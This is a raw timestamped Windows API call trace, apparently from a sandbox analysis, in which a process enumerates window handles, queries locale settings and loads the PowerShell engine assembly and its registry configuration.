	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x128
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x5c8
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x6f8
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x358
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x73c
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xb0
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x250
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x240
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x790
	[0631.392] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x61c
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x540
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x538
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x568
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x538
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x568
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x538
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x540
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x540
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x57c
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x460
	[0631.393] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x554
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x528
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x79c
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4e0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.394] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x460
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x460
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x44c
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x778
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x460
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x558
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x4d0
	[0631.395] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1bb4
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10bc
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b50
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x14b4
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x149c
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x14a8
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1490
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x14a4
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x148c
	[0631.396] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1458
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b4c
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1b3c
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x19bc
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x199c
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1998
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1994
	[0631.397] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1990
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1984
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x197c
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1978
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1824
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1088
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1908
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x18cc
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x18d0
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1840
	[0631.398] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10c4
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x128c
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16e8
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16cc
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x274
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10e0
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10cc
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10c0
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x10d0
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1198
	[0631.399] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1080
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1074
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x106c
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1474
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1414
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xbd0
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x550
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xa38
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16d0
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x16d4
	[0631.400] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x15bc
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x15a0
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x159c
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1598
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1594
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1590
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x158c
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1588
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1584
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1580
	[0631.401] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x157c
	[0631.402] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1488
	[0631.402] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x1404
	[0631.402] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0x11b8
	[0631.402] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xbd4
	[0631.402] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xed9a0 | out: lpdwProcessId=0xed9a0) returned 0xe0c
	[0631.406] WerSetFlags () returned 0x0
	[0634.060] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.060] CoTaskMemFree (pv=0x0) 
	[0634.061] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd00 | out: pulNumLanguages=0xedd08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd00) returned 1
	[0634.062] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd08, pwszLanguagesBuffer=0x2cd3f20, pcchLanguagesBuffer=0xedd00 | out: pulNumLanguages=0xedd08, pwszLanguagesBuffer=0x2cd3f20, pcchLanguagesBuffer=0xedd00) returned 1
	[0634.068] CoTaskMemAlloc (cb=0x24) returned 0x39fb10
	[0634.068] GetUserDefaultLocaleName (in: lpLocaleName=0x39fb10, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.069] CoTaskMemFree (pv=0x39fb10) 
	[0634.095] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0634.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0634.095] CoTaskMemFree (pv=0x340b90) 
	[0634.100] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0634.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0634.101] CoTaskMemFree (pv=0x340b90) 
	[0634.103] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0634.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0634.103] CoTaskMemFree (pv=0x340b90) 
	[0634.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0634.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0634.115] SetErrorMode (uMode=0x1) returned 0x1
	[0634.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed980 | out: lpFileInformation=0xed980*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0634.115] SetErrorMode (uMode=0x1) returned 0x1
	[0634.115] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedbf0 | out: lpdwHandle=0xedbf0) returned 0x94c
	[0634.117] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd77b0 | out: lpData=0x2cd77b0) returned 1
	[0634.118] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedb68, puLen=0xedb60 | out: lplpBuffer=0xedb68*=0x2cd784c, puLen=0xedb60) returned 1
	[0634.118] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7928, puLen=0xedad0) returned 1
	[0634.118] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0634.118] CoTaskMemAlloc (cb=0x2e) returned 0x3a2140
	[0634.118] lstrcpyW (in: lpString1=0x3a2140, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0634.118] CoTaskMemFree (pv=0x3a2140) 
	[0634.118] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd797c, puLen=0xedad0) returned 1
	[0634.118] lstrlenW (lpString="System.Management.Automation") returned 28
	[0634.118] CoTaskMemAlloc (cb=0x3c) returned 0x3a97b0
	[0634.118] lstrcpyW (in: lpString1=0x3a97b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0634.118] CoTaskMemFree (pv=0x3a97b0) 
	[0634.118] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd79d8, puLen=0xedad0) returned 1
	[0634.118] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0634.118] CoTaskMemAlloc (cb=0x20) returned 0x3a5e30
	[0634.118] lstrcpyW (in: lpString1=0x3a5e30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0634.119] CoTaskMemFree (pv=0x3a5e30) 
	[0634.119] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7a18, puLen=0xedad0) returned 1
	[0634.119] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0634.119] CoTaskMemAlloc (cb=0x44) returned 0x3a97b0
	[0634.119] lstrcpyW (in: lpString1=0x3a97b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0634.119] CoTaskMemFree (pv=0x3a97b0) 
	[0634.119] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7a80, puLen=0xedad0) returned 1
	[0634.119] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0634.119] CoTaskMemAlloc (cb=0x76) returned 0x341130
	[0634.119] lstrcpyW (in: lpString1=0x341130, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0634.119] CoTaskMemFree (pv=0x341130) 
	[0634.119] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7b1c, puLen=0xedad0) returned 1
	[0634.119] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0634.119] CoTaskMemAlloc (cb=0x44) returned 0x3a97b0
	[0634.119] lstrcpyW (in: lpString1=0x3a97b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0634.119] CoTaskMemFree (pv=0x3a97b0) 
	[0634.119] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7b80, puLen=0xedad0) returned 1
	[0634.119] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0634.119] CoTaskMemAlloc (cb=0x58) returned 0x3274e0
	[0634.119] lstrcpyW (in: lpString1=0x3274e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0634.119] CoTaskMemFree (pv=0x3274e0) 
	[0634.119] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd7bfc, puLen=0xedad0) returned 1
	[0634.119] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0634.119] CoTaskMemAlloc (cb=0x20) returned 0x3a5e30
	[0634.119] lstrcpyW (in: lpString1=0x3a5e30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0634.119] CoTaskMemFree (pv=0x3a5e30) 
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x2cd78a4, puLen=0xedad0) returned 1
	[0634.120] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0634.120] CoTaskMemAlloc (cb=0x66) returned 0x39a6c0
	[0634.120] lstrcpyW (in: lpString1=0x39a6c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0634.120] CoTaskMemFree (pv=0x39a6c0) 
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x0, puLen=0xedad0) returned 0
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x0, puLen=0xedad0) returned 0
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedad8, puLen=0xedad0 | out: lplpBuffer=0xedad8*=0x0, puLen=0xedad0) returned 0
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedaa8, puLen=0xedaa0 | out: lplpBuffer=0xedaa8*=0x2cd784c, puLen=0xedaa0) returned 1
	[0634.120] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0634.120] VerLanguageNameW (in: wLang=0x0, szLang=0x343ca0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0634.120] CoTaskMemFree (pv=0x343ca0) 
	[0634.120] VerQueryValueW (in: pBlock=0x2cd77b0, lpSubBlock="\\", lplpBuffer=0xedaf8, puLen=0xedaf0 | out: lplpBuffer=0xedaf8*=0x2cd77d8, puLen=0xedaf0) returned 1
	[0636.092] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0636.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.092] CoTaskMemFree (pv=0x340b90) 
	[0636.097] CoTaskMemAlloc (cb=0x104) returned 0x340b90
	[0636.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x340b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.097] CoTaskMemFree (pv=0x340b90) 
	[0636.102] lstrlenW (lpString="䅁") returned 1
	[0636.113] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed9c8 | out: phkResult=0xed9c8*=0x308) returned 0x0
	[0636.114] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xed9b8 | out: phkResult=0xed9b8*=0x30c) returned 0x0
	[0636.114] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xeda48 | out: phkResult=0xeda48*=0x310) returned 0x0
	[0636.116] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed98c, lpData=0x0, lpcbData=0xed988*=0x0 | out: lpType=0xed98c*=0x1, lpData=0x0, lpcbData=0xed988*=0x56) returned 0x0
	[0636.117] CoTaskMemAlloc (cb=0x5a) returned 0x39a650
	[0636.117] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed95c, lpData=0x39a650, lpcbData=0xed958*=0x56 | out: lpType=0xed95c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed958*=0x56) returned 0x0
	[0636.118] CoTaskMemFree (pv=0x39a650) 
	[0636.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
